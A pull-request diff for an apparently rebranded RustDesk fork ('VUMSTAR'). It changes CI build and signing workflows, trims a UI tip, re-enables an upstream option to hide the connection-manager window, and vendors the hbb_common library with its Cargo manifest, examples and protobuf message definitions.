### PR TITLE
11

### DIFF
--- a/.github/workflows/bridge.yml
+++ b/.github/workflows/bridge.yml
@@ -26,8 +26,6 @@ jobs:
     steps:
       - name: Checkout source code
         uses: actions/checkout@v4
-        with:
-          submodules: recursive
 
       - name: Install prerequisites
         run: |

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -107,8 +107,6 @@ jobs:
 
     - name: Checkout source code
       uses: actions/checkout@v4
-      with:
-        submodules: recursive
 
     - name: Install prerequisites
       shell: bash

--- a/.github/workflows/flutter-build-vumstar.yml
+++ b/.github/workflows/flutter-build-vumstar.yml
@@ -1,4 +1,4 @@
-name: Build the flutter version of the RustDesk
+name: Build the flutter version of the RustDesk VUMSTAR
 
 on:
   workflow_call:
@@ -39,13 +39,13 @@ env:
   # 2. Update the `VCPKG_COMMIT_ID` in `ci.yml` and `playground.yml`.
   VCPKG_COMMIT_ID: "120deac3062162151622ca4860575a33844ba10b"
   ARMV7_VCPKG_COMMIT_ID: "6f29f12e82a8293156836ad81cc9bf5af41fe836" # 2025.01.13, got "/opt/artifacts/vcpkg/vcpkg: No such file or directory" with latest version
-  VERSION: "1.4.6"
-  NDK_VERSION: "r28c"
+  VERSION: "1.4.4"
+  NDK_VERSION: "r27c"
   #signing keys env variable checks
   ANDROID_SIGNING_KEY: "${{ secrets.ANDROID_SIGNING_KEY }}"
   MACOS_P12_BASE64: "${{ secrets.MACOS_P12_BASE64 }}"
   UPLOAD_ARTIFACT: "${{ inputs.upload-artifact }}"
-  SIGN_BASE_URL: "${{ secrets.SIGN_BASE_URL }}-2"
+  SIGN_BASE_URL: ${{ secrets.SIGN_BASE_URL }}${{ secrets.SIGN_BASE_URL != '' && '-2' || '' }}
 
 jobs:
   generate-bridge:
@@ -89,6 +89,8 @@ jobs:
 
       - name: Checkout source code
         uses: actions/checkout@v4
+        with:
+          submodules: recursive
 
       - name: Restore bridge files
         uses: actions/download-artifact@master
@@ -232,7 +234,7 @@ jobs:
           path: rustdesk
 
       - name: Sign rustdesk files
-        if: env.UPLOAD_ARTIFACT == 'true' && env.SIGN_BASE_URL != '-2'
+        if: env.UPLOAD_ARTIFACT == 'true' && env.SIGN_BASE_URL != ''
         shell: bash
         run: |
           pip3 install requests argparse
@@ -264,7 +266,7 @@ jobs:
           sha256sum ../../SignOutput/rustdesk-*.msi
 
       - name: Sign rustdesk self-extracted file
-        if: env.UPLOAD_ARTIFACT == 'true' && env.SIGN_BASE_URL != '-2'
+        if: env.UPLOAD_ARTIFACT == 'true' && env.SIGN_BASE_URL != ''
         shell: bash
         run: |
           BASE_URL=${{ env.SIGN_BASE_URL }} SECRET_KEY=${{ secrets.SIGN_SECRET_KEY }} python3 res/job.py sign_files ./SignOutput
@@ -398,7 +400,7 @@ jobs:
           path: Release
 
       - name: Sign rustdesk files
-        if: env.UPLOAD_ARTIFACT == 'true' && env.SIGN_BASE_URL != '-2'
+        if: env.UPLOAD_ARTIFACT == 'true' && env.SIGN_BASE_URL != ''
         shell: bash
         run: |
           pip3 install requests argparse
@@ -416,7 +418,7 @@ jobs:
           mv ./target/release/rustdesk-portable-packer.exe ./SignOutput/rustdesk-${{ env.VERSION }}-${{ matrix.job.arch }}-sciter.exe
 
       - name: Sign rustdesk self-extracted file
-        if: env.UPLOAD_ARTIFACT == 'true' && env.SIGN_BASE_URL != '-2'
+        if: env.UPLOAD_ARTIFACT == 'true' && env.SIGN_BASE_URL != ''
         shell: bash
         run: |
           BASE_URL=${{ env.SIGN_BASE_URL }} SECRET_KEY=${{ secrets.SIGN_SECRET_KEY }} python3 res/job.py sign_files ./SignOutput/

--- a/.github/workflows/flutter-tag-vumstar.yml
+++ b/.github/workflows/flutter-tag-vumstar.yml
@@ -1,0 +1,18 @@
+name: Flutter Tag Build VUMSTAR
+
+on:
+  workflow_dispatch:
+  push:
+    tags:
+      - 'v[0-9]+.[0-9]+.[0-9]+'
+      - '[0-9]+.[0-9]+.[0-9]+'
+      - 'v[0-9]+.[0-9]+.[0-9]+-[0-9]+'
+      - '[0-9]+.[0-9]+.[0-9]+-[0-9]+'
+
+jobs:
+  run-flutter-tag-build:
+    uses: ./.github/workflows/flutter-build-vumstar.yml
+    secrets: inherit
+    with:
+      upload-artifact: true
+      upload-tag: ${{ github.ref_name }}

--- a/.github/workflows/playground.yml
+++ b/.github/workflows/playground.yml
@@ -89,7 +89,6 @@ jobs:
         uses: actions/checkout@v3
         with:
           ref: ${{ matrix.job.ref }}
-          submodules: recursive
 
       - name: Import the codesign cert
         if: env.MACOS_P12_BASE64 != null

--- a/.gitmodules
+++ b/.gitmodules
@@ -1,3 +1,1 @@
-[submodule "libs/hbb_common"]
-	path = libs/hbb_common
-	url = https://github.com/rustdesk/hbb_common
+

--- a/flutter/lib/desktop/pages/connection_page.dart
+++ b/flutter/lib/desktop/pages/connection_page.dart
@@ -78,36 +78,17 @@ class _OnlineStatusWidgetState extends State<OnlineStatusWidget> {
               .marginOnly(left: em),
         );
 
-    setupServerWidget() => Flexible(
-          child: Offstage(
-            offstage: !(!_svcStopped.value &&
-                stateGlobal.svcStatus.value == SvcStatus.ready &&
-                _svcIsUsingPublicServer.value),
-            child: Row(
-              crossAxisAlignment: CrossAxisAlignment.center,
-              children: [
-                Text(', ', style: TextStyle(fontSize: em)),
-                Flexible(
-                  child: InkWell(
-                    onTap: onUsePublicServerGuide,
-                    child: Row(
-                      children: [
-                        Flexible(
-                          child: Text(
-                            translate('setup_server_tip'),
-                            style: TextStyle(
-                                decoration: TextDecoration.underline,
-                                fontSize: em),
-                          ),
-                        ),
-                      ],
-                    ),
-                  ),
-                )
-              ],
-            ),
-          ),
-        );
+    Widget setupServerWidget() => Flexible(
+       child: Offstage(
+         offstage: !(!_svcStopped.value &&
+             stateGlobal.svcStatus.value == SvcStatus.ready &&
+             _svcIsUsingPublicServer.value),
+         child: Row(
+           crossAxisAlignment: CrossAxisAlignment.center,
+           children: [], 
+         ),
+       ),
+     );
 
     basicWidget() => Row(
           crossAxisAlignment: CrossAxisAlignment.center,

--- a/flutter/lib/desktop/pages/desktop_setting_page.dart
+++ b/flutter/lib/desktop/pages/desktop_setting_page.dart
@@ -1223,8 +1223,8 @@ class _SafetyState extends State<_Safety> with AutomaticKeepAliveClientMixin {
             if (usePassword && !isChangePermanentPasswordDisabled())
               _SubButton('Set permanent password', setPasswordDialog,
                   permEnabled && !locked),
-            // if (usePassword)
-            //   hide_cm(!locked).marginOnly(left: _kContentHSubMargin - 6),
+            if (usePassword)
+              hide_cm(!locked).marginOnly(left: _kContentHSubMargin - 6),
             if (usePassword) radios[2],
           ]);
         })));

--- a/libs/hbb_common/.gitignore
+++ b/libs/hbb_common/.gitignore
@@ -1,0 +1,3 @@
+/target
+**/*.rs.bk
+Cargo.lock

--- a/libs/hbb_common/Cargo.toml
+++ b/libs/hbb_common/Cargo.toml
@@ -1,0 +1,100 @@
+[package]
+name = "hbb_common"
+version = "0.1.0"
+authors = ["open-trade <info@opentradesolutions.com>"]
+edition = "2018"
+
+# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
+
+[features]
+default = []
+webrtc = ["dep:webrtc"]
+
+[dependencies]
+# new flexi_logger failed on rustc 1.75
+flexi_logger = { version = "0.27", features = ["async"] }
+protobuf = { version = "3.7", features = ["with-bytes"] }
+tokio = { version = "1.44", features = ["full"] }
+tokio-util = { version = "0.7", features = ["full"] }
+futures = "0.3"
+bytes = { version = "1.10", features = ["serde"] }
+log = "0.4"
+env_logger = "0.11"
+socket2 = { version = "0.3", features = ["reuseport"] }
+zstd = "0.13"
+anyhow = "1.0"
+futures-util = "0.3"
+directories-next = "2.0"
+rand = "0.8"
+serde_derive = "1.0"
+serde = "1.0"
+serde_json = "1.0"
+lazy_static = "1.5"
+confy = { git = "https://github.com/rustdesk-org/confy" }
+dirs-next = "2.0"
+filetime = "0.2"
+sodiumoxide = "0.2"
+regex = "1.11"
+tokio-socks = { git = "https://github.com/rustdesk-org/tokio-socks" }
+chrono = "0.4"
+backtrace = "0.3"
+libc = "0.2"
+dlopen = "0.1"
+toml = "0.7"
+uuid = { version = "1.16", features = ["v4"] }
+# new sysinfo issue: https://github.com/rustdesk/rustdesk/pull/6330#issuecomment-2270871442
+sysinfo = { git = "https://github.com/rustdesk-org/sysinfo", branch = "rlim_max" }
+# new flexi_logger failed on nightly rustc 1.75 for x86
+thiserror = "1.0"
+httparse = "1.10"
+base64 = "0.22"
+url = "2.5"
+sha2 = "0.10"
+whoami = "1.5"
+
+tokio-rustls = { version = "0.26", features = [
+    "logging",
+    "tls12",
+    "ring",
+], default-features = false }
+tokio-native-tls = "0.3"
+tokio-tungstenite = { version = "0.26", features = ["native-tls", "rustls-tls-native-roots", "rustls-tls-webpki-roots"] }
+tungstenite = { version = "0.26", features = ["native-tls", "rustls-tls-native-roots", "rustls-tls-webpki-roots"] }
+rustls-platform-verifier = "0.6"
+rustls-pki-types = "1.11"
+rustls-native-certs = "0.8"
+webpki-roots = "1.0.4"
+async-recursion = "1.1"
+webrtc = { version = "0.14.0", optional = true }
+libloading = "0.8"
+
+[target.'cfg(not(any(target_os = "android", target_os = "ios")))'.dependencies]
+mac_address = "1.1"
+default_net = { git = "https://github.com/rustdesk-org/default_net" }
+machine-uid = { git = "https://github.com/rustdesk-org/machine-uid" }
+
+[build-dependencies]
+protobuf-codegen = { version = "3.7" }
+
+[dev-dependencies]
+clap = "4.5.51"
+webrtc = "0.14.0"
+
+[target.'cfg(target_os = "windows")'.dependencies]
+winapi = { version = "0.3", features = [
+    "winuser",
+    "synchapi",
+    "pdh",
+    "memoryapi",
+    "sysinfoapi",
+] }
+
+[target.'cfg(target_os = "macos")'.dependencies]
+osascript = "0.3"
+
+[target.'cfg(target_os = "linux")'.dependencies]
+sctk = { package = "smithay-client-toolkit", version = "0.20.0", default-features = false, features = [
+    "calloop",
+] }
+users = { version = "0.11" }
+x11 = "2.21"

--- a/libs/hbb_common/build.rs
+++ b/libs/hbb_common/build.rs
@@ -1,0 +1,14 @@
+fn main() {
+    let out_dir = format!("{}/protos", std::env::var("OUT_DIR").unwrap());
+
+    std::fs::create_dir_all(&out_dir).unwrap();
+
+    protobuf_codegen::Codegen::new()
+        .pure()
+        .out_dir(out_dir)
+        .inputs(["protos/rendezvous.proto", "protos/message.proto"])
+        .include("protos")
+        .customize(protobuf_codegen::Customize::default().tokio_bytes(true))
+        .run()
+        .expect("Codegen failed.");
+}

--- a/libs/hbb_common/examples/config.rs
+++ b/libs/hbb_common/examples/config.rs
@@ -1,0 +1,5 @@
+extern crate hbb_common;
+
+fn main() {
+    println!("{:?}", hbb_common::config::PeerConfig::load("455058072"));
+}

--- a/libs/hbb_common/examples/system_message.rs
+++ b/libs/hbb_common/examples/system_message.rs
@@ -1,0 +1,20 @@
+extern crate hbb_common;
+#[cfg(target_os = "linux")]
+use hbb_common::platform::linux;
+#[cfg(target_os = "macos")]
+use hbb_common::platform::macos;
+
+fn main() {
+    #[cfg(target_os = "linux")]
+    let res = linux::system_message("test title", "test message", true);
+    #[cfg(target_os = "macos")]
+    let res = macos::alert(
+        "System Preferences".to_owned(),
+        "warning".to_owned(),
+        "test title".to_owned(),
+        "test message".to_owned(),
+        ["Ok".to_owned()].to_vec(),
+    );
+    #[cfg(any(target_os = "linux", target_os = "macos"))]
+    println!("result {:?}", &res);
+}

--- a/libs/hbb_common/examples/webrtc.rs
+++ b/libs/hbb_common/examples/webrtc.rs
@@ -1,0 +1,154 @@
+extern crate hbb_common;
+
+#[cfg(feature = "webrtc")]
+use hbb_common::webrtc::WebRTCStream;
+
+use std::io::Write;
+use anyhow::Result;
+use bytes::Bytes;
+use clap::{Arg, Command};
+use tokio::time::Duration;
+
+#[cfg(not(feature = "webrtc"))]
+#[tokio::main]
+async fn main() -> Result<()> {
+    println!(
+        "The webrtc feature is not enabled. \
+        Please enable the webrtc feature to run this example."
+    );
+    Ok(())
+}
+
+#[cfg(feature = "webrtc")]
+#[tokio::main]
+async fn main() -> Result<()> {
+    let app = Command::new("webrtc-stream")
+        .about("An example of webrtc stream using hbb_common and webrtc-rs")
+        .arg(
+            Arg::new("debug")
+                .long("debug")
+                .short('d')
+                .action(clap::ArgAction::SetTrue)
+                .help("Prints debug log information"),
+        )
+        .arg(
+            Arg::new("offer")
+                .long("offer")
+                .short('o')
+                .help("set offer from other endpoint"),
+        );
+
+    let matches = app.clone().get_matches();
+
+    let debug = matches.contains_id("debug");
+    if debug {
+        println!("Debug log enabled");
+        env_logger::Builder::new()
+            .format(|buf, record| {
+                writeln!(
+                    buf,
+                    "{}:{} [{}] {} - {}",
+                    record.file().unwrap_or("unknown"),
+                    record.line().unwrap_or(0),
+                    record.level(),
+                    chrono::Local::now().format("%H:%M:%S.%6f"),
+                    record.args()
+                )
+            })
+            .filter(Some("hbb_common"), log::LevelFilter::Debug)
+            .init();
+    }
+
+    let remote_endpoint = if let Some(endpoint) = matches.get_one::<String>("offer") {
+        endpoint.to_string()
+    } else {
+        "".to_string()
+    };
+
+    let webrtc_stream = WebRTCStream::new(&remote_endpoint, false, 30000).await?;
+    // Print the offer to be sent to the other peer
+    let local_endpoint = webrtc_stream.get_local_endpoint().await?;
+
+    if remote_endpoint.is_empty() {
+        println!();
+        // Wait for the answer to be pasted
+        println!(
+            "Start new terminal run: \n{} \ncopy remote endpoint and paste here",
+            format!(
+                "cargo r --features webrtc --example webrtc -- --offer {}",
+                local_endpoint
+            )
+        );
+        // readline blocking
+        let line = std::io::stdin()
+            .lines()
+            .next()
+            .ok_or_else(|| anyhow::anyhow!("No input received"))??;
+        webrtc_stream.set_remote_endpoint(&line).await?;
+    } else {
+        println!(
+            "Copy local endpoint and paste to the other peer: \n{}",
+            local_endpoint
+        );
+    }
+
+    let s1 = webrtc_stream.clone();
+    tokio::spawn(async move {
+        let _ = read_loop(s1).await;
+    });
+
+    let s2 = webrtc_stream.clone();
+    tokio::spawn(async move {
+        let _ = write_loop(s2).await;
+    });
+
+    println!("Press ctrl-c to stop");
+    tokio::select! {
+        _ = tokio::signal::ctrl_c() => {
+            println!();
+        }
+    };
+
+    Ok(())
+}
+
+// read_loop shows how to read from the datachannel directly
+#[cfg(feature = "webrtc")]
+async fn read_loop(mut stream: WebRTCStream) -> Result<()> {
+    loop {
+        let Some(res) = stream.next().await else {
+            println!("WebRTC stream closed; Exit the read_loop");
+            return Ok(());
+        };
+        match res {
+            Err(e) => {
+                println!("WebRTC stream read error: {}; Exit the read_loop", e);
+                return Ok(());
+            }
+            Ok(data) => {
+                println!("Message from stream: {}", String::from_utf8(data.to_vec())?);
+            }
+        }
+    }
+}
+
+// write_loop shows how to write to the webrtc stream directly
+#[cfg(feature = "webrtc")]
+async fn write_loop(mut stream: WebRTCStream) -> Result<()> {
+    let mut result = Result::<()>::Ok(());
+    while result.is_ok() {
+        let timeout = tokio::time::sleep(Duration::from_secs(5));
+        tokio::pin!(timeout);
+
+        tokio::select! {
+            _ = timeout.as_mut() =>{
+                let message = webrtc::peer_connection::math_rand_alpha(15);
+                result = stream.send_bytes(Bytes::from(message.clone())).await;
+                println!("Sent '{message}' {}", result.is_ok());
+            }
+        };
+    }
+    println!("WebRTC stream write failed; Exit the write_loop");
+
+    Ok(())
+}

--- a/libs/hbb_common/protos/message.proto
+++ b/libs/hbb_common/protos/message.proto
@@ -1,0 +1,983 @@
+syntax = "proto3";
+package hbb;
+
+message EncodedVideoFrame {
+  bytes data = 1;
+  bool key = 2;
+  int64 pts = 3;
+}
+
+message EncodedVideoFrames { repeated EncodedVideoFrame frames = 1; }
+
+message RGB { bool compress = 1; }
+
+// planes data send directly in binary for better use arraybuffer on web
+message YUV {
+  bool compress = 1;
+  int32 stride = 2;
+}
+
+enum Chroma {
+  I420 = 0;
+  I444 = 1;
+}
+
+message VideoFrame {
+  oneof union {
+    EncodedVideoFrames vp9s = 6;
+    RGB rgb = 7;
+    YUV yuv = 8;
+    EncodedVideoFrames h264s = 10;
+    EncodedVideoFrames h265s = 11;
+    EncodedVideoFrames vp8s = 12;
+    EncodedVideoFrames av1s = 13;
+  }
+  int32 display = 14;
+}
+
+message IdPk {
+  string id = 1;
+  bytes pk = 2;
+}
+
+message DisplayInfo {
+  sint32 x = 1;
+  sint32 y = 2;
+  int32 width = 3;
+  int32 height = 4;
+  string name = 5;
+  bool online = 6;
+  bool cursor_embedded = 7;
+  Resolution original_resolution = 8;
+  double scale = 9;
+}
+
+message PortForward {
+  string host = 1;
+  int32 port = 2;
+}
+
+message FileTransfer {
+  string dir = 1;
+  bool show_hidden = 2;
+}
+
+message ViewCamera {}
+
+message OSLogin {
+  string username = 1;
+  string password = 2;
+}
+
+message LoginRequest {
+  string username = 1;
+  bytes password = 2;
+  string my_id = 4;
+  string my_name = 5;
+  OptionMessage option = 6;
+  oneof union {
+    FileTransfer file_transfer = 7;
+    PortForward port_forward = 8;
+    ViewCamera view_camera = 15;
+    Terminal terminal = 16;
+  }
+  bool video_ack_required = 9;
+  uint64 session_id = 10;
+  string version = 11;
+  OSLogin os_login = 12;
+  string my_platform = 13;
+  bytes hwid = 14;
+  string avatar = 17;
+}
+
+message Terminal {
+  string service_id = 1;  // Service ID for reconnecting to existing session
+}
+
+message Auth2FA {
+  string code = 1;
+  bytes hwid = 2;
+}
+
+message ChatMessage { string text = 1; }
+
+message Features {
+  bool privacy_mode = 1;
+  bool terminal = 2;
+}
+
+message CodecAbility {
+  bool vp8 = 1;
+  bool vp9 = 2;
+  bool av1 = 3;
+  bool h264 = 4;
+  bool h265 = 5;
+}
+
+message SupportedEncoding {
+  bool h264 = 1;
+  bool h265 = 2;
+  bool vp8 = 3;
+  bool av1 = 4;
+  CodecAbility i444 = 5;
+}
+
+message PeerInfo {
+  string username = 1;
+  string hostname = 2;
+  string platform = 3;
+  repeated DisplayInfo displays = 4;
+  int32 current_display = 5;
+  bool sas_enabled = 6;
+  string version = 7;
+  Features features = 9;
+  SupportedEncoding encoding = 10;
+  SupportedResolutions resolutions = 11;
+  // Use JSON's key-value format which is friendly for peer to handle.
+  // NOTE: Only support one-level dictionaries (for peer to update), and the key is of type string.
+  string platform_additions = 12;
+  WindowsSessions windows_sessions = 13;
+}
+
+message WindowsSession {  
+  uint32 sid = 1;  
+  string name = 2;  
+}  
+
+message LoginResponse {
+  oneof union {
+    string error = 1;
+    PeerInfo peer_info = 2;
+  }
+  bool enable_trusted_devices = 3;
+}
+
+message TouchScaleUpdate {
+  // The delta scale factor relative to the previous scale.
+  // delta * 1000
+  // 0 means scale end
+  int32 scale = 1;
+}
+
+message TouchPanStart {
+  int32 x = 1;
+  int32 y = 2;
+}
+
+message TouchPanUpdate {
+  // The delta x position relative to the previous position.
+  int32 x = 1;
+  // The delta y position relative to the previous position.
+  int32 y = 2;
+}
+
+message TouchPanEnd {
+  int32 x = 1;
+  int32 y = 2;
+}
+
+message TouchEvent {
+  oneof union {
+    TouchScaleUpdate scale_update = 1;
+    TouchPanStart pan_start = 2;
+    TouchPanUpdate pan_update = 3;
+    TouchPanEnd pan_end = 4;
+  }
+}
+
+message PointerDeviceEvent {
+  oneof union {
+    TouchEvent touch_event = 1;
+  }
+  repeated ControlKey modifiers = 2;
+}
+
+message MouseEvent {
+  int32 mask = 1;
+  sint32 x = 2;
+  sint32 y = 3;
+  repeated ControlKey modifiers = 4;
+}
+
+enum KeyboardMode{
+  Legacy = 0;
+  Map = 1;
+  Translate = 2;
+  Auto = 3;
+}
+
+enum ControlKey {
+  Unknown = 0;
+  Alt = 1;
+  Backspace = 2;
+  CapsLock = 3;
+  Control = 4;
+  Delete = 5;
+  DownArrow = 6;
+  End = 7;
+  Escape = 8;
+  F1 = 9;
+  F10 = 10;
+  F11 = 11;
+  F12 = 12;
+  F2 = 13;
+  F3 = 14;
+  F4 = 15;
+  F5 = 16;
+  F6 = 17;
+  F7 = 18;
+  F8 = 19;
+  F9 = 20;
+  Home = 21;
+  LeftArrow = 22;
+  /// meta key (also known as "windows"; "super"; and "command")
+  Meta = 23;
+  /// option key on macOS (alt key on Linux and Windows)
+  Option = 24; // deprecated, use Alt instead
+  PageDown = 25;
+  PageUp = 26;
+  Return = 27;
+  RightArrow = 28;
+  Shift = 29;
+  Space = 30;
+  Tab = 31;
+  UpArrow = 32;
+  Numpad0 = 33;
+  Numpad1 = 34;
+  Numpad2 = 35;
+  Numpad3 = 36;
+  Numpad4 = 37;
+  Numpad5 = 38;
+  Numpad6 = 39;
+  Numpad7 = 40;
+  Numpad8 = 41;
+  Numpad9 = 42;
+  Cancel = 43;
+  Clear = 44;
+  Menu = 45; // deprecated, use Alt instead
+  Pause = 46;
+  Kana = 47;
+  Hangul = 48;
+  Junja = 49;
+  Final = 50;
+  Hanja = 51;
+  Kanji = 52;
+  Convert = 53;
+  Select = 54;
+  Print = 55;
+  Execute = 56;
+  Snapshot = 57;
+  Insert = 58;
+  Help = 59;
+  Sleep = 60;
+  Separator = 61;
+  Scroll = 62;
+  NumLock = 63;
+  RWin = 64;
+  Apps = 65;
+  Multiply = 66;
+  Add = 67;
+  Subtract = 68;
+  Decimal = 69;
+  Divide = 70;
+  Equals = 71;
+  NumpadEnter = 72;
+  RShift = 73;
+  RControl = 74;
+  RAlt = 75;
+  VolumeMute = 76; // mainly used on mobile devices as controlled side
+  VolumeUp = 77;
+  VolumeDown = 78;
+  Power = 79; // mainly used on mobile devices as controlled side
+  CtrlAltDel = 100;
+  LockScreen = 101;
+}
+
+message KeyEvent {
+  // `down` indicates the key's state(down or up).
+  bool down = 1;
+  // `press` indicates a click event(down and up).
+  bool press = 2;
+  oneof union {
+    ControlKey control_key = 3;
+    // position key code. win: scancode, linux: key code, macos: key code
+    uint32 chr = 4;
+    uint32 unicode = 5;
+    string seq = 6;
+    // high word. virtual keycode
+    // low word. unicode
+    uint32 win2win_hotkey = 7;
+  }
+  repeated ControlKey modifiers = 8;
+  KeyboardMode mode = 9;
+}
+
+message CursorData {
+  uint64 id = 1;
+  sint32 hotx = 2;
+  sint32 hoty = 3;
+  int32 width = 4;
+  int32 height = 5;
+  bytes colors = 6;
+}
+
+message CursorPosition {
+  sint32 x = 1;
+  sint32 y = 2;
+}
+
+message Hash {
+  string salt = 1;
+  string challenge = 2;
+}
+
+enum ClipboardFormat {
+  Text = 0;
+  Rtf = 1;
+  Html = 2;
+  ImageRgba = 21;
+  ImagePng = 22;
+  ImageSvg = 23;
+  Special = 31;
+}
+
+message Clipboard {
+  bool compress = 1;
+  bytes content = 2;
+  int32 width = 3;
+  int32 height = 4;
+  ClipboardFormat format = 5;
+  // Special format name, only used when format is Special.
+  string special_name = 6;
+}
+
+message MultiClipboards { repeated Clipboard clipboards = 1; }
+
+enum FileType {
+  Dir = 0;
+  DirLink = 2;
+  DirDrive = 3;
+  File = 4;
+  FileLink = 5;
+}
+
+message FileEntry {
+  FileType entry_type = 1;
+  string name = 2;
+  bool is_hidden = 3;
+  uint64 size = 4;
+  uint64 modified_time = 5;
+}
+
+message FileDirectory {
+  int32 id = 1;
+  string path = 2;
+  repeated FileEntry entries = 3;
+}
+
+message ReadDir {
+  string path = 1;
+  bool include_hidden = 2;
+}
+
+message ReadEmptyDirs {
+  string path = 1;
+  bool include_hidden = 2;
+}
+
+message ReadEmptyDirsResponse {
+  string path = 1;
+  repeated FileDirectory empty_dirs = 2;
+}
+
+message ReadAllFiles {
+  int32 id = 1;
+  string path = 2;
+  bool include_hidden = 3;
+}
+
+message FileRename {
+  int32 id = 1;
+  string path = 2;
+  string new_name = 3;
+}
+
+message FileAction {
+  oneof union {
+    ReadDir read_dir = 1;
+    FileTransferSendRequest send = 2;
+    FileTransferReceiveRequest receive = 3;
+    FileDirCreate create = 4;
+    FileRemoveDir remove_dir = 5;
+    FileRemoveFile remove_file = 6;
+    ReadAllFiles all_files = 7;
+    FileTransferCancel cancel = 8;
+    FileTransferSendConfirmRequest send_confirm = 9;
+    FileRename rename = 10;
+    ReadEmptyDirs read_empty_dirs = 11;
+  }
+}
+
+message FileTransferCancel { int32 id = 1; }
+
+message FileResponse {
+  oneof union {
+    FileDirectory dir = 1;
+    FileTransferBlock block = 2;
+    FileTransferError error = 3;
+    FileTransferDone done = 4;
+    FileTransferDigest digest = 5;
+    ReadEmptyDirsResponse empty_dirs = 6;
+  }
+}
+
+message FileTransferDigest {
+  int32 id = 1;
+  sint32 file_num = 2;
+  uint64 last_modified = 3;
+  uint64 file_size = 4;
+  bool is_upload = 5;
+  bool is_identical = 6;
+  uint64 transferred_size = 7; // For resume. Indicates the size of the file already transferred
+  bool is_resume = 8;          // For resume. Indicates if the transfer is a resume.
+                               // `is_resume` can let the controlled side know whether to check the `.digest` file.
+                               // When `is_resume` is false, `.digest` exists, the same file does not exist,
+                               // the controlled side should not check `.digest`, it should confirm with a new transfer request.
+}
+
+message FileTransferBlock {
+  int32 id = 1;
+  sint32 file_num = 2;
+  bytes data = 3;
+  bool compressed = 4;
+  uint32 blk_id = 5;
+}
+
+message FileTransferError {
+  int32 id = 1;
+  string error = 2;
+  sint32 file_num = 3;
+}
+
+message FileTransferSendRequest {
+  int32 id = 1;
+  string path = 2;
+  bool include_hidden = 3;
+  int32 file_num = 4;
+
+  enum FileType {
+    Generic = 0;
+    Printer = 1;
+  }
+  FileType file_type = 5;
+}
+
+message FileTransferSendConfirmRequest {
+  int32 id = 1;
+  sint32 file_num = 2;
+  oneof union {
+    bool skip = 3;
+    uint32 offset_blk = 4;
+  }
+}
+
+message FileTransferDone {
+  int32 id = 1;
+  sint32 file_num = 2;
+}
+
+message FileTransferReceiveRequest {
+  int32 id = 1;
+  string path = 2; // path written to
+  repeated FileEntry files = 3;
+  int32 file_num = 4;
+  uint64 total_size = 5;
+}
+
+message FileRemoveDir {
+  int32 id = 1;
+  string path = 2;
+  bool recursive = 3;
+}
+
+message FileRemoveFile {
+  int32 id = 1;
+  string path = 2;
+  sint32 file_num = 3;
+}
+
+message FileDirCreate {
+  int32 id = 1;
+  string path = 2;
+}
+
+// main logic from freeRDP
+message CliprdrMonitorReady {
+}
+
+message CliprdrFormat {
+  int32 id = 2;
+  string format = 3;
+}
+
+message CliprdrServerFormatList {
+  repeated CliprdrFormat formats = 2;
+}
+
+message CliprdrServerFormatListResponse {
+  int32 msg_flags = 2;
+}
+
+message CliprdrServerFormatDataRequest {
+  int32 requested_format_id = 2;
+}
+
+message CliprdrServerFormatDataResponse {
+  int32 msg_flags = 2;
+  bytes format_data = 3;
+}
+
+message CliprdrFileContentsRequest {
+  int32 stream_id = 2;
+  int32 list_index = 3;
+  int32 dw_flags = 4;
+  int32 n_position_low = 5;
+  int32 n_position_high = 6;
+  int32 cb_requested = 7;
+  bool have_clip_data_id = 8;
+  int32 clip_data_id = 9;
+}
+
+message CliprdrFileContentsResponse {
+  int32 msg_flags = 3;
+  int32 stream_id = 4;
+  bytes requested_data = 5;
+}
+
+// Try empty clipboard in the following case(Windows only):
+// 1. `A`(Windows) -> `B`, `C`
+// 2. Copy in `A, file clipboards on `B` and `C` are updated.
+// 3. Copy in `B`.
+// `A` should tell `C` to empty the file clipboard.
+message CliprdrTryEmpty {
+}
+
+// Clipobard file message for audit.
+message CliprdrFile {
+  string name = 1;
+  uint64 size = 2;
+}
+
+message CliprdrFiles {
+  repeated CliprdrFile files = 1;
+}
+
+message Cliprdr {
+  oneof union {
+    CliprdrMonitorReady ready = 1;
+    CliprdrServerFormatList format_list = 2;
+    CliprdrServerFormatListResponse format_list_response = 3;
+    CliprdrServerFormatDataRequest format_data_request = 4;
+    CliprdrServerFormatDataResponse format_data_response = 5;
+    CliprdrFileContentsRequest file_contents_request = 6;
+    CliprdrFileContentsResponse file_contents_response = 7;
+    CliprdrTryEmpty try_empty = 8;
+    CliprdrFiles files = 9;
+  }
+}
+
+message Resolution {
+  int32 width = 1;
+  int32 height = 2;
+}
+
+message DisplayResolution {
+  int32 display = 1;
+  Resolution resolution = 2;
+}
+
+message SupportedResolutions { repeated Resolution resolutions = 1; }
+
+message SwitchDisplay {
+  int32 display = 1;
+  sint32 x = 2;
+  sint32 y = 3;
+  int32 width = 4;
+  int32 height = 5;
+  bool cursor_embedded = 6;
+  SupportedResolutions resolutions = 7;
+  // Do not care about the origin point for now.
+  Resolution original_resolution = 8;
+}
+
+message CaptureDisplays {
+  repeated int32 add = 1;
+  repeated int32 sub = 2;
+  repeated int32 set = 3;
+}
+
+message ToggleVirtualDisplay {
+  int32 display = 1;
+  bool on = 2;
+}
+
+message TogglePrivacyMode {
+  string impl_key = 1;
+  bool on = 2;
+}
+
+message PermissionInfo {
+  enum Permission {
+    Keyboard = 0;
+    Clipboard = 2;
+    Audio = 3;
+    File = 4;
+    Restart = 5;
+    Recording = 6;
+    BlockInput = 7;
+  }
+
+  Permission permission = 1;
+  bool enabled = 2;
+}
+
+enum ImageQuality {
+  NotSet = 0;
+  Low = 2;
+  Balanced = 3;
+  Best = 4;
+}
+
+message SupportedDecoding {
+  enum PreferCodec {
+    Auto = 0;
+    VP9 = 1;
+    H264 = 2;
+    H265 = 3;
+    VP8 = 4;
+    AV1 = 5;
+  }
+
+  int32 ability_vp9 = 1;
+  int32 ability_h264 = 2;
+  int32 ability_h265 = 3;
+  PreferCodec prefer = 4;
+  int32 ability_vp8 = 5;
+  int32 ability_av1 = 6;
+  CodecAbility i444 = 7;
+  Chroma prefer_chroma = 8;
+}
+
+message OptionMessage {
+  enum BoolOption {
+    NotSet = 0;
+    No = 1;
+    Yes = 2;
+  }
+  ImageQuality image_quality = 1;
+  BoolOption lock_after_session_end = 2;
+  BoolOption show_remote_cursor = 3;
+  BoolOption privacy_mode = 4;
+  BoolOption block_input = 5;
+  int32 custom_image_quality = 6;
+  BoolOption disable_audio = 7;
